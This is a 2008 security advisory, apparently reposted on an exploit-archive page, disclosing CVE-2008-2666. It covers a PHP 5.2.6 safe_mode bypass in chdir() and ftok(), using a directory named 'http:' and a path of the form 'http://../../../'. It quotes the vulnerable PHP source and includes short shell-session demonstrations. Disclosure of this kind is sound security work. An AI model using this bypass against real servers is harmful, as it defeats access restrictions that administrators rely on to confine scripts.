PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass

PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass SecurityAlert : 3942 CVE : CVE-2008-2666 CWE : CWE-264 SecurityRisk : Medium Remote Exploit : No Local Exploit : Yes Victim interaction required : No[b] Exploit Given : Yes[/b] ExploitAlert : 4226 Credit : Maksymilian Arciemowicz Published : 17.06.2008 Updated : 30.06.2008Affected Software : PHP 5.2.6 and prior-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ]Author: Maksymilian Arciemowicz (cXIb8O3)securityreason.comDate:- - Written: 10.05.2008- - Public: 17.06.2008SecurityReason ResearchSecurityAlert Id: 55CVE: CVE-2008-2666CWE: CWE-264SecurityRisk: MediumAffected Software: PHP 5.2.6Advisory URL: http://securityreason.com/achievement_securityalert/55Vendor: http://www.php.net- --- 0.Description ---PHP is an HTML-embedded scripting language. Much of its syntax is borrowedfrom C, Java and Perl with a couple of unique PHP-specific features thrownin. The goal of the language is to allow web developers to writedynamically generated pages quickly.chdir ? Change directorySYNOPSIS:bool chdir ( string $directory )http://pl.php.net/manual/en/function.chdir.phpftok ? Convert a pathname and a project identifier to a System V IPC keySYNOPSIS:int ftok ( string $pathname , string $proj )http://pl.php.net/manual/en/function.ftok.php!!! WARNING !!!IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASONWILL NOT LIST ALL VULNERABLE FUNCTIONS- --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---Let's see to chdir() function- ---PHP_FUNCTION(chdir){char *str;int ret, str_len;if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len)== FAILURE) {RETURN_FALSE;}if ((PG(safe_mode) && !php_checkuid(str, NULL,CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {RETURN_FALSE;}ret = VCWD_CHDIR(str);if (ret != 0) {php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)",strerror(errno), errno);RETURN_FALSE;}RETURN_TRUE;}- ---str is beeing checked by safe_modeexample:- ---Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8- ---in current directory, we should create subdir "http:". => it is possible tocreate chdir("http://../../../../../../")and we are in /Why?TRUE==((PG(safe_mode) && !php_checkuid(str, NULL,CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)))forstr="http://../../../../../../"safe_mode will ignore all paths with http://that same situation with ftok() function (and more)- ---EXAMPLE1---cxib# cat /www/wufff.phpcxib# ls -la /www/wufff.php- -rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.phpcxib# php /www/wufff.php/wwwWarning: chdir(): SAFE MODE Restriction in effect. The script whose uid is80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line3/wwwcxib#- ---/EXAMPLE1---- ---EXAMPLE2---cxib# ls -la /www/wufff.php- -rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.phpcxib# ls -la /www/http:total 8drwxr-xr-x 2 www www 512 Jun 17 17:12 .drwxr-xr-x 19 www www 4608 Jun 17 17:13 ..cxib# cat /www/wufff.phpcxib# php /www/wufff.php/www/etccxib#- ---/EXAMPLE2---!!! WARNING !!!IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASONWILL NOT LISTS ALL VULNERABLE FUNCTIONS- --- 2. How to fix ---Do not use safe_mode as a main safety- --- 3. Greets ---sp3x Infospec schain p_e_a Chujwamwdupe- --- 4. Contact ---Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]Email: cxib [at] securityreason [dot] comGPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpghttp://securityreason.comhttp://securityreason.pl-----BEGIN PGP SIGNATURE-----Version: GnuPG v2.0.4 (FreeBSD)iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9W6fcb5TR6GxN9osji+wQCqM==tyyL-----END PGP SIGNATURE-----